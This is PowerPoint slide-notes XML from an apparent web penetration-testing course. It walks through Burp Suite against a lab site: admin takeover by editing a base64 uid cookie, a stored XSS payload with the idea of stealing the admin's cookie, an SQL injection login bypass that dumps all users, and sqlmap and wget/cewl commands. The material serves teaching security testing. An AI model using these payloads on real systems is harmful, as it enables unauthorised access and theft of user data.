              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to extract the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> name for quickly validating names to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>uids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Select the line “You are logged in as &lt;name&gt;” in the Response window that pops up.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33268213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The responses show that the admin has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of MQ==,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or 1.</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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31298691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You can validate the UID for the admin by fetching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the base page in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and intercepting the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the Proxy tab, click the Intercept tab, and then click the Intercept is off button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the browser, refresh the current page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Modify the UID to MQ==.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Turn Intercept back off.</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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10242958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Press F5 to reload or click the refresh icon at the end of the URL bar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27948653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Modify the UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to try and become admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Edit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to be: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=MQ%3D%3D.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Click on the Forward button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Now click on the Intercept is on button to turn interception off.</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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8860172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Now we are admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> so we verified the UID works two ways now. </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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26141632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Validate form when creating a new user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manually fuzzing the signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> box by using the ‘ character, and by attempting a persistent XSS injection attack.</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209663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Using a MySQL server based upon error message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possibly open to SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2965839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Use various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> techniques to build a good site map. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> are plugins that will open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> files from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> that will then be imported into Burp, along with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.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Wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>-r -l 3 -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> (proxy through system to burp)</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Cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>--depth 2 --write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>outfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> --count --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>proxy_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> 127.0.0.1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>proxy_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> 8082 https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>domain.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39636872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Add an extra %27 around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> each ‘ in the original alert string. Or use double quotes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Original signature:  signature=%3Cscript%3Ealert%28%27Signature+box+xss%27%29%3B%3C%2Fscript%3E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Modified signature: signature=%3Cscript%3Ealert%28%27%27Signature+box+xss%27%27%29%3B%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32091978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The proof of concept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for XSS shows vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Maybe do something more interesting like steal the cookie of the admin?</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40981470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We have the ability to see user details – can I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> become admin by getting the password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Enter the user credentials that were previously created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Name: Mike</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Password: why</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Submit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As the XSS in the signature fired, perhaps we could email the admin to look at my account as I can’t login? Then steal the cookies of the admin?</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35297017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Send the Original request from the user info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>to the Repeater Tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Press Go to validate what the response will look like in the Response window.</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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38590589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Keep the valid user name. For the password use a single ‘ to see if any errors come back. (URL encode the ‘)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As an error came back the page looks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to be vulnerable to SQL injections. No further tests are needed as this is not a blind attack.</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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23579400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Alter the password to be ‘ or ‘a’=‘a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%27 = ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%20 = space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> use the Decoder Tool to encode the string.</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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13577880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Right click on the Response and select Request in Browser-&gt;In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Original Session</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19393534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Copy the Burp URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25710660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Paste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Burp URL into browser, and press Enter.</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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24486437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All users in the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> have been dumped to the screen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> you should never do this. This is a breech by dumping sensitive user data, we should never know the usernames or any passwords.</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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19020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Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is complete, inspect the content of the site. Look for comments in HTML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and any other files. If documents are found such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or doc files then try to get the metadata for those files as it might be useful later on.</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5064122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See if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the Login page is vulnerable to SQL injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Fuzz the parameters first to see if anything comes back and to get the request into the HTTP History tab so we can easily send to other tools.</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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14002577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The login page is vulnerable to SQL injection. As this is not blind further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tests do not need to be ran.</a:t>
            </a:r>
          </a:p>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6007769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Find the manual fuzzing request in the HTTP History Tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Right click on the Item and select Send To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33141572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If you haven’t setup SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> map in Burp you need to configure it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In a terminal you can find the path to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> map:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Once configured, select the OK button.</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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29738817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To Start off,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> check Databases, Tables, and Columns check boxes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>You can either click the Run button here or open a terminal and type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Commad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from above&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If you run from Burp you can not move around in Burp until the bash shell is closed.</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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16113914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Running SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> map from the command line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> -u ‘http://dojo-basic:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>’ --data=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>admin&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a&amp;Submit_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=Submit’ --columns --tables</a:t>
            </a:r>
          </a:p>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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21854917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The results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of SQL Map can be found in the log file: ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
